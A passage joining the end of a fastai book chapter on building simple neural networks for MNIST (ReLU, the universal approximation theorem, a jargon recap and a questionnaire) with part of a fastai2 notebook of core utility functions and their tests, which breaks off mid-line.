intimidating and difficult to get into than it should be. You do have to learn the jargon, because otherwise papers and tutorials are not going to mean much to you. But that doesn't mean you have to find the jargon intimidating. Just remember, when you come across a word or phrase that you haven't seen before, it will almost certainly turn to be referring to a very simple concept. The basic idea is that by using more linear layers, we can have our model do more computation, and therefore model more complex functions. But there's no point just putting one linear layout directly after another one, because when we multiply things together and then add them up multiple times, that could be replaced by multiplying different things together and adding them up just once! That is to say, a series of any number of linear layers in a row can be replaced with a single linear layer with a different set of parameters. But if we put a nonlinear function between them, such as `max`, then this is no longer true. Now each linear layer is actually somewhat decoupled from the other ones, and can do its own useful work. The `max` function is particularly interesting, because it operates as a simple `if` statement. > S: Mathematically, we say the composition of two linear functions is another linear function. So, we can stack as many linear classifiers as we want on top of each other, and without nonlinear functions between them, it will just be the same as one linear classifier. Amazingly enough, it can be mathematically proven that this little function can solve any computable problem to an arbitrarily high level of accuracy, if you can find the right parameters for `w1` and `w2` and if you make these matrices big enough. For any arbitrarily wiggly function, we can approximate it as a bunch of lines joined together; to make it closer to the wiggly function, we just have to use shorter lines. This is known as the *universal approximation theorem*. The three lines of code that we have here are known as *layers*. The first and third are known as *linear layers*, and the second line of code is known variously as a *nonlinearity*, or *activation function*. Just like in the previous section, we can replace this code with something a bit simpler, by taking advantage of PyTorch: ``` simple_net = nn.Sequential( nn.Linear(28*28,30), nn.ReLU(), nn.Linear(30,1) ) ``` `nn.Sequential` creates a module that will call each of the listed layers or functions in turn. `nn.ReLU` is a PyTorch module that does exactly the same thing as the `F.relu` function. Most functions that can appear in a model also have identical forms that are modules. Generally, it's just a case of replacing `F` with `nn` and changing the capitalization. When using `nn.Sequential`, PyTorch requires us to use the module version. Since modules are classes, we have to instantiate them, which is why you see `nn.ReLU()` in this example. Because `nn.Sequential` is a module, we can get its parameters, which will return a list of all the parameters of all the modules it contains. Let's try it out! As this is a deeper model, we'll use a lower learning rate and a few more epochs. ``` learn = Learner(dls, simple_net, opt_func=SGD, loss_func=mnist_loss, metrics=batch_accuracy) #hide_output learn.fit(40, 0.1) ``` We're not showing the 40 lines of output here to save room; the training process is recorded in `learn.recorder`, with the table of output stored in the `values` attribute, so we can plot the accuracy over training as: ``` plt.plot(L(learn.recorder.values).itemgot(2)); ``` And we can view the final accuracy: ``` learn.recorder.values[-1][2] ``` At this point we have something that is rather magical: 1. A function that can solve any problem to any level of accuracy (the neural network) given the correct set of parameters 1. A way to find the best set of parameters for any function (stochastic gradient descent) This is why deep learning can do things which seem rather magical such fantastic things. Believing that this combination of simple techniques can really solve any problem is one of the biggest steps that we find many students have to take. It seems too good to be true—surely things should be more difficult and complicated than this? Our recommendation: try it out! We just tried it on the MNIST dataset and you have seen the results. And since we are doing everything from scratch ourselves (except for calculating the gradients) you know that there is no special magic hiding behind the scenes. ### Going Deeper There is no need to stop at just two linear layers. We can add as many as we want, as long as we add a nonlinearity between each pair of linear layers. As you will learn, however, the deeper the model gets, the harder it is to optimize the parameters in practice. Later in this book you will learn about some simple but brilliantly effective techniques for training deeper models. We already know that a single nonlinearity with two linear layers is enough to approximate any function. So why would we use deeper models? The reason is performance. With a deeper model (that is, one with more layers) we do not need to use as many parameters; it turns out that we can use smaller matrices with more layers, and get better results than we would get with larger matrices, and few layers. That means that we can train the model more quickly, and it will take up less memory. In the 1990s researchers were so focused on the universal approximation theorem that very few were experimenting with more than one nonlinearity. This theoretical but not practical foundation held back the field for years. Some researchers, however, did experiment with deep models, and eventually were able to show that these models could perform much better in practice. Eventually, theoretical results were developed which showed why this happens. Today, it is extremely unusual to find anybody using a neural network with just one nonlinearity. Here what happens when we train an 18-layer model using the same approach we saw in <<chapter_intro>>: ``` dls = ImageDataLoaders.from_folder(path) learn = cnn_learner(dls, resnet18, pretrained=False, loss_func=F.cross_entropy, metrics=accuracy) learn.fit_one_cycle(1, 0.1) ``` Nearly 100% accuracy! That's a big difference compared to our simple neural net. But as you'll learn in the remainder of this book, there are just a few little tricks you need to use to get such great results from scratch yourself. You already know the key foundational pieces. (Of course, even once you know all the tricks, you'll nearly always want to work with the pre-built classes provided by PyTorch and fastai, because they save you having to think about all the little details yourself.) ## Jargon Recap Congratulations: you now know how to create and train a deep neural network from scratch! We've gone through quite a few steps to get to this point, but you might be surprised at how simple it really is. Now that we are at this point, it is a good opportunity to define, and review, some jargon and key concepts. A neural network contains a lot of numbers, but they are only of two types: numbers that are calculated, and the parameters that these numbers are calculated from. This gives us the two most important pieces of jargon to learn: - Activations:: Numbers that are calculated (both by linear and nonlinear layers) - Parameters:: Numbers that are randomly initialized, and optimized (that is, the numbers that define the model) We will often talk in this book about activations and parameters. Remember that they have very specific meanings. They are numbers. They are not abstract concepts, but they are actual specific numbers that are in your model. Part of becoming a good deep learning practitioner is getting used to the idea of actually looking at your activations and parameters, and plotting them and testing whether they are behaving correctly. Our activations and parameters are all contained in *tensors*. These are simply regularly shaped arrays—for example, a matrix. Matrices have rows and columns; we call these the *axes* or *dimensions*. The number of dimensions of a tensor is its *rank*. There are some special tensors: - Rank zero: scalar - Rank one: vector - Rank two: matrix A neural network contains a number of layers. Each layer is either *linear* or *nonlinear*. We generally alternate between these two kinds of layers in a neural network. Sometimes people refer to both a linear layer and its subsequent nonlinearity together as a single layer. Yes, this is confusing. Sometimes a nonlinearity is referred to as an *activation function*. <<dljargon1>> summarizes the key concepts related to SGD. ```asciidoc [[dljargon1]] .Deep learning vocabulary [options="header"] |===== | Term | Meaning |ReLU | Function that returns 0 for negative numbers and doesn't change positive numbers. |Mini-batch | A smll group of inputs and labels gathered together in two arrays. A gradient descent step is updated on this batch (rather than a whole epoch). |Forward pass | Applying the model to some input and computing the predictions. |Loss | A value that represents how well (or badly) our model is doing. |Gradient | The derivative of the loss with respect to some parameter of the model. |Backward pass | Computing the gradients of the loss with respect to all model parameters. |Gradient descent | Taking a step in the directions opposite to the gradients to make the model parameters a little bit better. |Learning rate | The size of the step we take when applying SGD to update the parameters of the model. |===== ``` > note: _Choose Your Own Adventure_ Reminder: Did you choose to skip over chapters 2 & 3, in your excitement to peek under the hood? Well, here's your reminder to head back to chapter 2 now, because you'll be needing to know that stuff very soon! ## Questionnaire 1. How is a grayscale image represented on a computer? How about a color image? 1. How are the files and folders in the `MNIST_SAMPLE` dataset structured? Why? 1. Explain how the "pixel similarity" approach to classifying digits works. 1. What is a list comprehension? Create one now that selects odd numbers from a list and doubles them. 1. What is a "rank-3 tensor"? 1. What is the difference between tensor rank and shape? How do you get the rank from the shape? 1. What are RMSE and L1 norm? 1. How can you apply a calculation on thousands of numbers at once, many thousands of times faster than a Python loop? 1. Create a 3×3 tensor or array containing the numbers from 1 to 9. Double it. Select the bottom-right four numbers. 1. What is broadcasting? 1. Are metrics generally calculated using the training set, or the validation set? Why? 1. What is SGD? 1. Why does SGD use mini-batches? 1. What are the seven steps in SGD for machine learning? 1. How do we initialize the weights in a model? 1. What is "loss"? 1. Why can't we always use a high learning rate? 1. What is a "gradient"? 1. Do you need to know how to calculate gradients yourself? 1. Why can't we use accuracy as a loss function? 1. Draw the sigmoid function. What is special about its shape? 1. What is the difference between a loss function and a metric? 1. What is the function to calculate new weights using a learning rate? 1. What does the `DataLoader` class do? 1. Write pseudocode showing the basic steps taken in each epoch for SGD. 1. Create a function that, if passed two arguments `[1,2,3,4]` and `'abcd'`, returns `[(1, 'a'), (2, 'b'), (3, 'c'), (4, 'd')]`. What is special about that output data structure? 1. What does `view` do in PyTorch? 1. What are the "bias" parameters in a neural network? Why do we need them? 1. What does the `@` operator do in Python? 1. What does the `backward` method do? 1. Why do we have to zero the gradients? 1. What information do we have to pass to `Learner`? 1. Show Python or pseudocode for the basic steps of a training loop. 1. What is "ReLU"? Draw a plot of it for values from `-2` to `+2`. 1. What is an "activation function"? 1. What's the difference between `F.relu` and `nn.ReLU`? 1. The universal approximation theorem shows that any function can be approximated as closely as needed using just one nonlinearity. So why do we normally use more? ### Further Research 1. Create your own implementation of `Learner` from scratch, based on the training loop shown in this chapter. 1. Complete all the steps in this chapter using the full MNIST datasets (that is, for all digits, not just 3s and 7s). This is a significant project and will take you quite a bit of time to complete! You'll need to do some of your own research to figure out how to overcome some obstacles you'll meet on the way.
github_jupyter
``` #default_exp core.utils #export from fastai2.test import * from fastai2.core.foundation import * from fastai2.core.imports import * from nbdev.showdoc import * from PIL import Image import torch ``` # Utility functions > Utility functions used in the fastai library ## Basics ``` # export def ifnone(a, b): "`b` if `a` is None else `a`" return b if a is None else a ``` Since `b if a is None else a` is such a common pattern, we wrap it in a function. However, be careful, because python will evaluate *both* `a` and `b` when calling `ifnone` (which it doesn't do if using the `if` version directly). ``` test_eq(ifnone(None,1), 1) test_eq(ifnone(2 ,1), 2) #export def get_class(nm, *fld_names, sup=None, doc=None, funcs=None, **flds): "Dynamically create a class, optionally inheriting from `sup`, containing `fld_names`" attrs = {} for f in fld_names: attrs[f] = None for f in L(funcs): attrs[f.__name__] = f for k,v in flds.items(): attrs[k] = v sup = ifnone(sup, ()) if not isinstance(sup, tuple): sup=(sup,) def _init(self, *args, **kwargs): for i,v in enumerate(args): setattr(self, list(attrs.keys())[i], v) for k,v in kwargs.items(): setattr(self,k,v) def _repr(self): return '\n'.join(f'{o}: {getattr(self,o)}' for o in set(dir(self)) if not o.startswith('_') and not isinstance(getattr(self,o), types.MethodType)) if not sup: attrs['__repr__'] = _repr attrs['__init__'] = _init res = type(nm, sup, attrs) if doc is not None: res.__doc__ = doc return res _t = get_class('_t', 'a', b=2) t = _t() test_eq(t.a, None) test_eq(t.b, 2) t = _t(1, b=3) test_eq(t.a, 1) test_eq(t.b, 3) t = _t(1, 3) test_eq(t.a, 1) test_eq(t.b, 3) ``` Most often you'll want to call `mk_class`, since it adds the class to your module. See `mk_class` for more details and examples of use (which also apply to `get_class`). ``` #export def mk_class(nm, *fld_names, sup=None, doc=None, funcs=None, mod=None, **flds): "Create a class using `get_class` and add to the caller's module" if mod is None: mod = inspect.currentframe().f_back.f_locals res = get_class(nm, *fld_names, sup=sup, doc=doc, funcs=funcs, **flds) mod[nm] = res ``` Any `kwargs` will be added as class attributes, and `sup` is an optional (tuple of) base classes. ``` mk_class('_t', a=1, sup=GetAttr) t = _t() test_eq(t.a, 1) assert(isinstance(t,GetAttr)) ``` A `__init__` is provided that sets attrs for any `kwargs`, and for any `args` (matching by position to fields), along with a `__repr__` which prints all attrs. The docstring is set to `doc`. You can pass `funcs` which will be added as attrs with the function names. ``` def foo(self): return 1 mk_class('_t', 'a', sup=GetAttr, doc='test doc', funcs=foo) t = _t(3, b=2) test_eq(t.a, 3) test_eq(t.b, 2) test_eq(t.foo(), 1) test_eq(t.__doc__, 'test doc') t #export def wrap_class(nm, *fld_names, sup=None, doc=None, funcs=None, **flds): "Decorator: makes function a method of a new class `nm` passing parameters to `mk_class`" def _inner(f): mk_class(nm, *fld_names, sup=sup, doc=doc, funcs=L(funcs)+f, mod=f.__globals__, **flds) return f return _inner @wrap_class('_t', a=2) def bar(self,x): return x+1 t = _t() test_eq(t.a, 2) test_eq(t.bar(3), 4) show_doc(noop) noop() test_eq(noop(1),1) show_doc(noops) mk_class('_t', foo=noops) test_eq(_t().foo(1),1) #export def store_attr(self, nms): "Store params named in comma-separated `nms` from calling context into attrs in `self`" mod = inspect.currentframe().f_back.f_locals for n in re.split(', *', nms): setattr(self,n,mod[n]) class T: def __init__(self, a,b,c): store_attr(self, 'a,b, c') t = T(1,c=2,b=3) assert t.a==1 and t.b==3 and t.c==2 #export def attrdict(o, *ks): "Dict from each `k` in `ks` to `getattr(o,k)`" return {k:getattr(o,k) for k in ks} test_eq(attrdict(t,'b','c'), {'b':3, 'c':2}) #export def properties(cls, *ps): "Change attrs in `cls` with names in `ps` to properties" for p in ps: setattr(cls,p,property(getattr(cls,p))) class T: def a(self): return 1 def b(self): return 2 properties(T,'a') test_eq(T().a,1) test_eq(T().b(),2) #export _camel_re1 = re.compile('(.)([A-Z][a-z]+)') _camel_re2 = re.compile('([a-z0-9])([A-Z])') #export def camel2snake(name): "Convert CamelCase to snake_case" s1 = re.sub(_camel_re1, r'\1_\2', name) return re.sub(_camel_re2, r'\1_\2', s1).lower() test_eq(camel2snake('ClassAreCamel'), 'class_are_camel') #export def snake2camel(s): "Convert snake_case to CamelCase" return ''.join(s.title().split('_')) test_eq(snake2camel('a_b_cc'), 'ABCc') #export def class2attr(self, cls_name): return camel2snake(re.sub(rf'{cls_name}$', '', self.__class__.__name__) or cls_name.lower()) #export def hasattrs(o,attrs): for attr in attrs: if not hasattr(o,attr): return False return True assert hasattrs(1,('imag','real')) assert not hasattrs(1,('imag','foo')) ``` ## Collection functions ``` #export def tuplify(o, use_list=False, match=None): "Make `o` a tuple" return tuple(L(o, use_list=use_list, match=match)) test_eq(tuplify(None),()) test_eq(tuplify([1,2,3]),(1,2,3)) test_eq(tuplify(1,match=[1,2,3]),(1,1,1)) #export def detuplify(x): "If `x` is a tuple with one thing, extract it" return None if len(x)==0 else x[0] if len(x)==1 and getattr(x, 'ndim', 1)==1 else x test_eq(detuplify(()),None) test_eq(detuplify([1]),1) test_eq(detuplify([1,2]), [1,2]) test_eq(detuplify(np.array([[1,2]])), np.array([[1,2]])) #export def replicate(item,match): "Create tuple of `item` copied `len(match)` times" return (item,)*len(match) t = [1,1] test_eq(replicate([1,2], t),([1,2],[1,2])) test_eq(replicate(1, t),(1,1)) #export def uniqueify(x, sort=False, bidir=False, start=None): "Return the unique elements in `x`, optionally `sort`-ed, optionally return the reverse correspondence." res = L(x).unique() if start is not None: res = start+res if sort: res.sort() if bidir: return res, res.val2idx() return res # test test_eq(set(uniqueify([1,1,0,5,0,3])),{0,1,3,5}) test_eq(uniqueify([1,1,0,5,0,3], sort=True),[0,1,3,5]) v,o = uniqueify([1,1,0,5,0,3], bidir=True) test_eq(v,[1,0,5,3]) test_eq(o,{1:0, 0: 1, 5: 2, 3: 3}) v,o = uniqueify([1,1,0,5,0,3], sort=True, bidir=True) test_eq(v,[0,1,3,5]) test_eq(o,{0:0, 1: 1, 3: 2, 5: 3}) # export def setify(o): return o if isinstance(o,set) else set(L(o)) # test test_eq(setify(None),set()) test_eq(setify('abc'),{'abc'}) test_eq(setify([1,2,2]),{1,2}) test_eq(setify(range(0,3)),{0,1,2}) test_eq(setify({1,2}),{1,2}) #export def merge(*ds): "Merge all dictionaries in `ds`" return {k:v for d in ds if d is not None for k,v in d.items()} test_eq(merge(), {}) test_eq(merge(dict(a=1,b=2)), dict(a=1,b=2)) test_eq(merge(dict(a=1,b=2), dict(b=3,c=4), None), dict(a=1, b=3, c=4)) #export def is_listy(x): "`isinstance(x, (tuple,list,L))`" return isinstance(x, (tuple,list,L,slice,Generator)) assert is_listy([1]) assert is_listy(L([1])) assert is_listy(slice(2)) assert not is_listy(array([1])) #export def range_of(x): "All indices of collection `x` (i.e. `list(range(len(x)))`)" return list(range(len(x))) test_eq(range_of([1,1,1,1]), [0,1,2,3]) #export def groupby(x, key): "Like `itertools.groupby` but doesn't need to be sorted, and isn't lazy" res = {} for o in x: res.setdefault(key(o), []).append(o) return res test_eq(groupby('aa ab bb'.split(), itemgetter(0)), {'a':['aa','ab'], 'b':['bb']}) #export def first(x): "First element of `x`; i.e. a shortcut for `next(iter(x))`" return next(iter(x)) #export def shufflish(x, pct=0.04): "Randomly relocate items of `x` up to `pct` of `len(x)` from their starting location" n = len(x) return L(x[i] for i in sorted(range_of(x), key=lambda o: o+n*(1+random.random()*pct))) l = list(range(100)) l2 = array(shufflish(l)) test_close(l2[:50 ].mean(), 25, eps=5) test_close(l2[-50:].mean(), 75, eps=5) test_ne(l,l2) #export class IterLen: "Base class to add iteration to anything supporting `len` and `__getitem__`" def __iter__(self): return (self[i] for i in range_of(self)) #export @docs class ReindexCollection(GetAttr, IterLen): "Reindexes collection `coll` with indices `idxs` and optional LRU cache of size `cache`" _default='coll' def __init__(self, coll, idxs=None, cache=None): self.coll,self.idxs,self.cache = coll,ifnone(idxs,L.range(coll)),cache def _get(self, i): return self.coll[i] self._get = types.MethodType(_get,self) if cache is not None: self._get = functools.lru_cache(maxsize=cache)(self._get) def __getitem__(self, i): return self._get(self.idxs[i]) def __len__(self): return len(self.coll) def reindex(self, idxs): self.idxs = idxs def shuffle(self): random.shuffle(self.idxs) def cache_clear(self): self._get.cache_clear() _docs = dict(reindex="Replace `self.idxs` with idxs", shuffle="Randomly shuffle indices", cache_clear="Clear LRU cache") sz = 50 t = ReindexCollection(L.range(sz), cache=2) test_eq(list(t), range(sz)) test_eq(t[sz-1], sz-1) test_eq(t._get.cache_info().hits, 1) t.shuffle() test_eq(t._get.cache_info().hits, 1) test_ne(list(t), range(sz)) test_eq(set(t), set(range(sz))) t.cache_clear() test_eq(t._get.cache_info().hits, 0) test_eq(t.count(0), 1) #export def _oper(op,a,b=np.nan): return (lambda o:op(o,a)) if b!=b else op(a,b) def _mk_op(nm, mod=None): "Create an operator using `oper` and add to the caller's module" if mod is None: mod = inspect.currentframe().f_back.f_locals op = getattr(operator,nm) def _inner(a,b=np.nan): return _oper(op, a,b) _inner.__name__ = _inner.__qualname__ = nm _inner.__doc__ = f'Same as `operator.{nm}`, or returns partial if 1 arg' mod[nm] = _inner #export _all_ = ['lt','gt','le','ge','eq','ne','add','sub','mul','truediv','is_','is_not'] #export for op in ['lt','gt','le','ge','eq','ne','add','sub','mul','truediv','is_','is_not']: _mk_op(op) ``` The following functions are provided matching the behavior of the equivalent versions in `operator`: - *lt gt le ge eq ne add sub mul truediv* ``` lt(3,5),gt(3,5),is_(None,None) ``` However, they also have additional functionality: if you only pass one param, they return a partial function that passes that param as the second positional parameter. ``` lt(5)(3),gt(5)(3),is_(None)(None) #export class _InfMeta(type): @property def count(self): return itertools.count() @property def zeros(self): return itertools.cycle([0]) @property def ones(self): return itertools.cycle([1]) @property def nones(self): return itertools.cycle([None]) #export class Inf(metaclass=_InfMeta): "Infinite lists" pass ``` `Inf` defines the following properties: - `count: itertools.count()` - `zeros: itertools.cycle([0])` - `ones : itertools.cycle([1])` - `nones: itertools.cycle([None])` ``` test_eq([o for i,o in zip(range(5), Inf.count)], [0, 1, 2, 3, 4]) test_eq([o for i,o in zip(range(5), Inf.zeros)], [0, 0, 0, 0, 0]) #export def true(*args, **kwargs): "Predicate: always `True`" return True #export def stop(e=StopIteration): "Raises exception `e` (by default `StopException`) even if in an expression" raise e #export def gen(func, seq, cond=true): "Like `(func(o) for o in seq if cond(func(o)))` but handles `StopIteration`" return itertools.takewhile(cond, map(func,seq)) test_eq(gen(noop, Inf.count, lt(5)), range(5)) test_eq(gen(operator.neg, Inf.count, gt(-5)), [0,-1,-2,-3,-4]) test_eq(gen(lambda o:o if o<5 else stop(), Inf.count), range(5)) #export def chunked(it, cs, drop_last=False): if not isinstance(it, Iterator): it = iter(it) while True: res = list(itertools.islice(it, cs)) if res and (len(res)==cs or not drop_last): yield res if len(res)<cs: return t = L.range(10) test_eq(chunked(t,3), [[0,1,2], [3,4,5], [6,7,8], [9]]) test_eq(chunked(t,3,True), [[0,1,2], [3,4,5], [6,7,8], ]) t = map(lambda o:stop() if o==6 else o, Inf.count) test_eq(chunked(t,3), [[0, 1, 2], [3, 4, 5]]) t = map(lambda o:stop() if o==7 else o, Inf.count) test_eq(chunked(t,3), [[0, 1, 2], [3, 4, 5], [6]]) t = np.arange(10) test_eq(chunked(t,3), L([0,1,2], [3,4,5], [6,7,8], [9])) test_eq(chunked(t,3,True), L([0,1,2], [3,4,5], [6,7,8], )) #export def retain_type(new, old=None, typ=None): "Cast `new` to type of `old` or `typ` if it's a superclass" # e.g. old is TensorImage, new is Tensor - if not subclass then do nothing if new is None: return new assert old is not None or typ is not None if typ is None: if not isinstance(old, type(new)): return new typ = old if isinstance(old,type) else type(old) # Do nothing the new type is already an instance of requested type (i.e. same type) return typ(new, **getattr(old, '_meta', {})) if typ!=NoneType and not isinstance(new, typ) else new class _T(tuple): pass a = _T((1,2)) b = tuple((1,2)) test_eq_type(retain_type(b, typ=_T), a) ``` If `old` has a `_meta` attribute, its content is passed when casting `new` to the type of `old`. ``` class _A(): def __init__(self, t): self.t=t class _B1(_A): def __init__(self, t, a=1): super().__init__(t) self._meta = {'a': a} x = _B1(1, a=2) b = _A(1) test_eq(retain_type(b, old=x)._meta, {'a': 2}) #export def retain_types(new, old=None, typs=None): "Cast each item of `new` to type of matching item in `old` if it's a superclass" if not is_listy(new): return retain_type(new, old, typs) return type(new)(L(new, old, typs).map_zip(retain_type, cycled=True)) class T(tuple): pass t1,t2 = retain_types((1,(1,)), (2,T((2,)))) test_eq_type(t1, 1) test_eq_type(t2, T((1,))) #export @patch def split_arr(df:pd.DataFrame, from_col): "Split col `from_col` (containing arrays) in `DataFrame` `df` into separate colums" col = df[from_col] n = len(col.iloc[0]) cols = [f'{from_col}{o}' for o in range(n)] df[cols] = pd.DataFrame(df[from_col].values.tolist()) df.drop(columns=from_col, inplace=True) df = pd.DataFrame(dict(a=[[1,2,3],[4,5,6]])) df.split_arr('a') test_eq(df, pd.DataFrame(dict(a0=[1,4],a1=[2,5],a2=[3,6]))) ``` ## Simple types ``` #export def show_title(o, ax=None, ctx=None, label=None, color='black', **kwargs): "Set title of `ax` to `o`, or print `o` if `ax` is `None`" ax = ifnone(ax,ctx) if ax is None: print(o) elif hasattr(ax, 'set_title'): t = ax.title.get_text() if len(t) > 0: o = t+'\n'+str(o) ax.set_title(o, color=color) elif isinstance(ax, pd.Series): while label in ax: label += '_' ax = ax.append(pd.Series({label: o})) return ax test_stdout(lambda: show_title("title"), "title") # ensure that col names are unique when showing to a pandas series assert show_title("title", ctx=pd.Series(dict(a=1)), label='a').equals(pd.Series(dict(a=1,a_='title'))) #export class ShowTitle: "Base class that adds a simple `show`" _show_args = {'label': 'text'} def show(self, ctx=None, **kwargs): return show_title(str(self), ctx=ctx, **merge(self._show_args, kwargs)) class Int(int, ShowTitle): pass class Float(float, ShowTitle): pass class Str(str, ShowTitle): pass add_docs(Int, "An `int` with `show`"); add_docs(Str, "An `str` with `show`"); add_docs(Float, "An `float` with `show`") show_doc(Int, title_level=3) show_doc(Str, title_level=3) show_doc(Float, title_level=3) test_stdout(lambda: Str('s').show(), 's') test_stdout(lambda: Int(1).show(), '1') #export num_methods = """ __add__ __sub__ __mul__ __matmul__ __truediv__ __floordiv__ __mod__ __divmod__ __pow__ __lshift__ __rshift__ __and__ __xor__ __or__ __neg__ __pos__ __abs__ """.split() rnum_methods = """ __radd__ __rsub__ __rmul__ __rmatmul__ __rtruediv__ __rfloordiv__ __rmod__ __rdivmod__ __rpow__ __rlshift__ __rrshift__ __rand__ __rxor__ __ror__ """.split() inum_methods = """ __iadd__ __isub__ __imul__ __imatmul__ __itruediv__ __ifloordiv__ __imod__ __ipow__ __ilshift__ __irshift__ __iand__ __ixor__ __ior__ """.split() #export class Tuple(tuple): "A `tuple` with elementwise ops and more friendly __init__ behavior" def __new__(cls, x=None, *rest): if x is None: x = () if not isinstance(x,tuple): if len(rest): x = (x,) else: try: x = tuple(iter(x)) except TypeError: x = (x,) return super().__new__(cls, x+rest if rest else x) def _op(self,op,*args): if not isinstance(self,Tuple): self = Tuple(self) return type(self)(map(op,self,*map(cycle, args))) def mul(self,*args): "`*` is already defined in `tuple` for replicating, so use `mul` instead" return Tuple._op(self, operator.mul,*args) def add(self,*args): "`+` is already defined in `tuple` for concat, so use `add` instead" return Tuple._op(self, operator.add,*args) def _get_op(op): if isinstance(op,str): op = getattr(operator,op) def _f(self,*args): return self._op(op,*args) return _f for n in num_methods: if not hasattr(Tuple, n) and hasattr(operator,n): setattr(Tuple,n,_get_op(n)) for n in 'eq ne lt le gt ge'.split(): setattr(Tuple,n,_get_op(n)) setattr(Tuple,'__invert__',_get_op('__not__')) setattr(Tuple,'max',_get_op(max)) setattr(Tuple,'min',_get_op(min)) test_eq(Tuple(1), (1,)) test_eq(type(Tuple(1)), Tuple) test_eq_type(Tuple(1,2), Tuple(1,2)) test_ne(Tuple(1,2), Tuple(1,3)) test_eq(Tuple(), ()) test_eq(Tuple((1,2)), (1,2)) test_eq(-Tuple(1,2), (-1,-2)) test_eq(Tuple(1,1)-Tuple(2,2), (-1,-1)) test_eq(Tuple.add((1,1),(2,2)), (3,3)) test_eq(Tuple(1,1).add((2,2)), Tuple(3,3)) test_eq(Tuple('1','2').add('2'), Tuple('12','22')) test_eq_type(Tuple(1,1).add(2), Tuple(3,3)) test_eq_type(Tuple(1,1).mul(2), Tuple(2,2)) test_eq(Tuple(3,1).le(1), (False, True)) test_eq(Tuple(3,1).eq(1), (False, True)) test_eq(Tuple(3,1).gt(1), (True, False)) test_eq(Tuple(3,1).min(2), (2,1)) test_eq(~Tuple(1,0,1), (False,True,False)) #export class TupleTitled(Tuple, ShowTitle): "A `Tuple` with `show`" pass ``` ## Functions on functions ``` #export def trace(f): "Add `set_trace` to an existing function `f`" def _inner(*args,**kwargs): set_trace() return f(*args,**kwargs) return _inner # export def compose(*funcs, order=None): "Create a function that composes all functions in `funcs`, passing along remaining `*args` and `**kwargs` to all" funcs = L(funcs) if len(funcs)==0: return noop if len(funcs)==1: return funcs[0] if order is not None: funcs = funcs.sorted(order) def _inner(x, *args, **kwargs): for f in L(funcs): x = f(x, *args, **kwargs) return x return _inner f1 = lambda o,p=0: (o*2)+p f2 = lambda o,p=1: (o+1)/p test_eq(f2(f1(3)), compose(f1,f2)(3)) test_eq(f2(f1(3,p=3),p=3), compose(f1,f2)(3,p=3)) test_eq(f2(f1(3, 3), 3), compose(f1,f2)(3, 3)) f1.order = 1 test_eq(f1(f2(3)), compose(f1,f2, order="order")(3)) #export def maps(*args, retain=noop): "Like `map`, except funcs are composed first" f = compose(*args[:-1]) def _f(b): return retain(f(b), b) return map(_f, args[-1]) test_eq(maps([1]), [1]) test_eq(maps(operator.neg, [1,2]), [-1,-2]) test_eq(maps(operator.neg, operator.neg, [1,2]), [1,2]) test_eq_type(list(maps(operator.neg, [Tuple((1,)), 2], retain=retain_type)), [Tuple((-1,)), -2]) #export def partialler(f, *args, order=None, **kwargs): "Like `functools.partial` but also copies over docstring" fnew = partial(f,*args,**kwargs) fnew.__doc__ = f.__doc__ if order is not None: fnew.order=order elif hasattr(f,'order'): fnew.order=f.order return fnew def _f(x,a=1): "test func" return x+a _f.order=1 f = partialler(_f, a=2) test_eq(f.order, 1) f = partialler(_f, a=2, order=3) test_eq(f.__doc__, "test func") test_eq(f.order, 3) test_eq(f(3), _f(3,2)) #export def mapped(f, it): "map `f` over `it`, unless it's not listy, in which case return `f(it)`" return L(it).map(f) if is_listy(it) else f(it) test_eq(mapped(_f,1),2) test_eq(mapped(_f,[1,2]),[2,3]) test_eq(mapped(_f,(1,)),(2,)) #export def instantiate(t): "Instantiate `t` if it's a type, otherwise do nothing" return t() if isinstance(t, type) else t test_eq_type(instantiate(int), 0) test_eq_type(instantiate(1), 1) #export class _Self: "An alternative to `lambda` for calling methods on passed object." def __init__(self): self.nms,self.args,self.kwargs,self.ready = [],[],[],True def __repr__(self): return f'self: {self.nms}({self.args}, {self.kwargs})' def __call__(self, *args, **kwargs): if self.ready: x = args[0] for n,a,k in zip(self.nms,self.args,self.kwargs): x = getattr(x,n) if callable(x) and a is not None: x = x(*a, **k) return x else: self.args.append(args) self.kwargs.append(kwargs) self.ready = True return self def __getattr__(self,k): if not self.ready: self.args.append(None) self.kwargs.append(None) self.nms.append(k) self.ready = False return self class _SelfCls: def __getattr__(self,k): return getattr(_Self(),k) Self = _SelfCls() #export _all_ = ['Self'] ``` ### Self fastai provides a concise way to create lambdas that are calling methods on an object, which is to use `Self` (note the capitalization!) `Self.sum()`, for instance, is a shortcut for `lambda o: o.sum()`. ``` f = Self.sum() x = array([3.,1]) test_eq(f(x), 4.) # This is equivalent to above f = lambda o: o.sum() x = array([3.,1]) test_eq(f(x), 4.) f = Self.sum().is_integer() x = array([3.,1]) test_eq(f(x), True) f = Self.sum().real.is_integer() x = array([3.,1]) test_eq(f(x), True) f = Self.imag() test_eq(f(3), 0) ``` ## File and network functions ``` #export @patch def readlines(self:Path, hint=-1, encoding='utf8'): "Read the content of `fname`" with self.open(encoding=encoding) as f: return f.readlines(hint) #export @patch def read(self:Path, size=-1, encoding='utf8'): "Read the content of `fname`" with self.open(encoding=encoding) as f: return f.read(size) #export @patch def write(self:Path, txt, encoding='utf8'): "Write `txt` to `self`, creating directories as needed" self.parent.mkdir(parents=True,exist_ok=True) with self.open('w', encoding=encoding) as f: f.write(txt) with tempfile.NamedTemporaryFile() as f: fn = Path(f.name) fn.write('t') t = fn.read() test_eq(t,'t') t = fn.readlines() test_eq(t,['t']) #export @patch def save(fn:Path, o): "Save a pickle file, to a file name or opened file" if not isinstance(fn, io.IOBase): fn = open(fn,'wb') try: pickle.dump(o, fn) finally: fn.close() #export @patch def load(fn:Path): "Load a pickle file from a file name or opened file" if not isinstance(fn, io.IOBase): fn = open(fn,'rb') try: return pickle.load(fn) finally: fn.close() with tempfile.NamedTemporaryFile() as f: fn = Path(f.name) fn.save('t') t = fn.load() test_eq(t,'t') #export #NB: Please don't move this to a different line or module, since it's used in testing `get_source_link` @patch def ls(self:Path, n_max=None, file_type=None, file_exts=None): "Contents of path as a list" extns=L(file_exts) if file_type: extns += L(k for k,v in mimetypes.types_map.items() if v.startswith(file_type+'/')) has_extns = len(extns)==0 res = (o for o in self.iterdir() if has_extns or o.suffix in extns) if n_max is not None: res = itertools.islice(res, n_max) return L(res) ``` We add an `ls()` method to `pathlib.Path` which is simply defined as `list(Path.iterdir())`, mainly for convenience in REPL environments such as notebooks. ``` path = Path() t = path.ls() assert len(t)>0 t1 = path.ls(10) test_eq(len(t1), 10) t2 = path.ls(file_exts='.ipynb') assert 